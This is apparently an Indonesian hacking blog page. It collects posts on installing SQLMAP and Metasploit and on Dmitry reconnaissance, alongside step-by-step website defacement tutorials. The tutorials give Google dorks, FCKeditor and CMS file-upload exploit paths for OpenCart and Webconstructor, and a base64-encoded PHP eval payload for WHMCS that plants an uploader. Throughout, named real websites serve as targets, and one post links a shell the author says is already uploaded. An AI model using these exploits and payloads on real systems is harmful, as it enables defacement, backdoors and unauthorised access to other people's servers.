Showing posts with label ./Hacking. Show all posts
Showing posts with label ./Hacking. Show all posts

Sunday, March 17, 2013

Install SQLMAP di Windows XP , 7 , 8

   Selamat malam reader :)
Sekarang ini saya mau share tentang SQLMAP di windows.. Sebenernya main SQLMAP di windows ini emang agak ribet.. Dari mulai mendownload Python , active python dan yg terakhir mendownlaoad SQLMAP nya..
Untuk command SQLMAP di windows dengan di Linux tetep sama kok, jadi gak perlu khawatir...
 Oke langsung saja, 
  1. Download python, dan yg pasti buat windows.. download versi yg berapa saja.. Download pyhton disini ..
  2. Download Active Python , agar SQLMAP dapat berjalan Download Active Python
  3. Dan yg terakhir download SLQMAP .. Download SQLMAP disini 
Kalau sudah terdownload semua.. di lakukan untuk instalasi Python dan Active Phyton.. Tunggu sampai selesai, dan di lanjut dengan SQLMAP nya..
Extract SQLMAP nya di directory mana saja..
Dan cara untuk menggunakan SQLMAP nya adalah dengan membuka CMD dan masuk ke dalam directory dimana agan agan menyimpan SQLMAP 

Contoh : Saya menyimpan SQLMAP di directory C:/ --> Pentest --> SQLMAP






SQLMAP berjalan =))
Sekian dari saya..
Semoga bermanfaat :)
Read more

Thursday, February 28, 2013

Bermain dengan Dmitry

    Selamat siang reader :)
Untuk postingan kali ini ane mau sharing cara cek Subdomain dengan Dmitry .
Sekilas tentang dmitry

Jadi dmitry ini sebenernya tools tracing , dari Ip HOST atau langsung dari URL webnya..
Ex :
Dmitry www.target.com -i

-i ini di artikan sebagai untuk melookup HOST dari IP tersebut (CMIIW)
Atau anda dapat menggunakan command yg lain
Ex : Dmitry www.target.com -w
      Dmitry www.target.com -p
dan lain-lain..

Nah , yg saya suka dari Dmitry ini informasi yg di keluarkan SANGAT lengkap!!! :D
Dari mulai Kota , Kode Telefon , Nomor telefon , sampai ke NAMA JALAN! :D


Sekian postingan dari saya..
Semoga bermanfaat :)

Read more

Monday, February 25, 2013

Simple Deface OpenCart Website


 Kali ini ane mau berbagi cara deface website dengan mudah dan simpel ga repot kok gan.
Sebelum belajar deface ini, sebaiknya baca ini dulu supaya lebih mengerti: http://www.binushacker.net/cara-deface-website-dengan-file-upload.html, karena artikel ini hampir sama dengan artikel di link tersebut.
Oke, langsung aja nih caranya
Seperti biasa nyarinya lewat paman google.
( Dorknya copy ke search engine google )
Dork nya :
SUPPORT BY OPENCART
atau
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
Klo pengen smuanya, site nya ilangin jadi gini aja Powered By OpenCart
Detail exploitnya adalah:
==========================================
Opencart remote file Upload Vulnerability
==========================================

#Exploit Title: Opencart remote file uploade
#Author: Net.Edit0r
#Email: Net.Edit0r@Att.Net ~ Black.Hat.tm@Gmail.com
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php

######################################Iranian HackerZ####################################

# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the "File Upload" To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php

######################################Demo Example####################################

#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#

#########################################################################################

#Spical Thanks To >> Darkcoder ~ Classic ~ Jenne bamaram ~ S3Ri0uS ~
_AriaNet_ And All B0x ((Web : ( http://houseofhackers.net/forum/ )))

########################################## End ##########################################


Langsung ke caranya,


Jika kamu sudah mendapatkan target nya
Contoh Target: http://www.digitalbazzar.co.uk/shop bisa juga http://www.digitalbazzar.co.uk/cart,
www.digitalbazzar.co.uk/patch, dll.
Klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Jadinya kaya gini:http://www.digitalbazzar.co.uk/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Klo ketemu yang kya gini http://digitalbazzar.co.uk/shop/ kamu inject di belakang /shop/ nya..
Jangan lupa connector waktu uploadnya di ganti jadi PHP
Lalu kamu upload deh  file defacenya, jika berhasil maka ada bacaan alert seperti ini “file uploaded with no errors”
Untuk melihat apakan berhasil di upload atau tidak kamu ke “Get Folders and Files” dan lihat hasilnya…
Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
Selamat mencoba .


Read more

CMS Webconstructor Remote File Upload Vulnerability


===============================================
Exploit Title: CMS Webconstructor Remote File Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3
===============================================
-> Exploit <-
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
-> Allowed File <-
You can upload ,html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp
-> Preview <-
- You can see if you success upload file.
-> Live Target <-
- http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
===============================================
Sudah cukup begitu, saya rasa kalian sudah mengerti bagaimana cara eksekusi nya hehe, kalau yang bingung? Komen aja di bawah, InsyaAllah saya feedback dengan cepat 
Semoga bermanfaat aja ya, Wassalamualaikum
Read more

Wednesday, February 20, 2013

Install Metasploit 4 di Linux

   Oke kali ini saya mau share caranya install Metasploit 4 di Linux , untuk installasi metasploit kali ini cukup mudah kok =)) tinggal Download --> Chmod --> Install gampang kan??
Langsung aja yaaa..

Pertama download installer nya dulu wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run installer ini akan otomatis tersimpan di directory home , sebelum menginstall metasploit nya gunakan perintah chmod 775 terlebih dahulu chmod 775 ./metasploit-latest-linux-installer.run setelah itu baru  kalian dapat menginstall nya dengan cara ./metasploit-latest-linux-installer.run tunggu sampai proses installasi selesai kemudian ketik msfconsole untuk menggunakan metasploit .

Nb: untuk pengguna Ubuntu di SARAN kan untuk menjadi root terlebih dahulu

Selamat mencoba
Read more

Tuesday, January 29, 2013

WHMCS Exploit with Submit Ticket

    Sebelumnya saya ingin menjelaskan apa sih WHMCS itu?? WHMCS adalah sebuah cms yg memudahkan kita untuk membuat server hostingan itu menurut saya, kalo kurang jelas search di google.
Oke langsung aja ke POC nya ;)


   Exploit with submit ticket php:
1. Carilah sebuah site yg Vuln dengan menggunakan dork / juga bisa menggunakan irc jika ada BOTnya. Nih saya Share Dorknya dikit aja ya, kalo banyak" nanti ga cukup docnya :v :

intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php" intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"


2. Misalnya kita mendapatkan target, okelah saya contohkan site yang vuln :

https://billing.byehosting.com.au/byehosting/billing/submitticket.php?step=2&deptid=4


3. Isikan exploit berikut yang sudah saya encrypt kedalam base64 : 
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJ
aUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL3N5bmRyb20ucGhwIiwidyIpOw0KZndyaXRlKCRmbywkY29kZSk7')) ;{/php})

Name : exploitnya 
Email   : aku@gay.com
Subject : exploitnya
Kolom besar : exploitnya
Verification di isi jika ada

Exploit di atas berisi script php upload dan dir path dimana tempat upload itu muncul.

4. Kalo Sudah di isi, kemudian cek apakah muncul tempat upload atau tidak, dengan mengganti menjadi :

https://billing.byehosting.com.au/byehosting/billing/templates/syndrom.php


Kalo muncul , upload aja langsung shellnya / Backdoor. :D
Kalo tidak muncul istilah lain not found / forbidden, berarti tidak vuln.
Berikut Shell yang sudah saya upload :

https://billing.byehosting.com.au/byehosting/billing/templates/manipulasiberasaldarikatamenipulasi.php

Read more

Friday, January 11, 2013

Teknik Mendeface Website

Pertama kalian siapkan file Txt(Buat aja di notepad), kemudian cari target di google dengan dork, jika sudah masukan POC http://[localhost]//apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.htmlsebagai contoh  http://perplexed.co.uk akan menjadihttp://perplexed.co.uk/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html , kemudian upload file txt yang kamu buat tadi, jika sudah akan menjadi seperti inihttp://perplexed.co.uk/userfiles/16/nama file kamu.txt    ...... SELESAI


Google  Dork(Untuk Mencari Target Di Google) : 
- inurl:/apps/fckeditor

POC:
- http://[localhost]//apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html

Live Demo(CONTOH) :
- http://perplexed.co.uk/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html
- http://www.pant-y-lon.co.uk/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html


Hanya Bisa Upload File txt, tidak bisa Upload HTML...
Oke deh, semoga berguna aja ya ilmu dari saya :D
Read more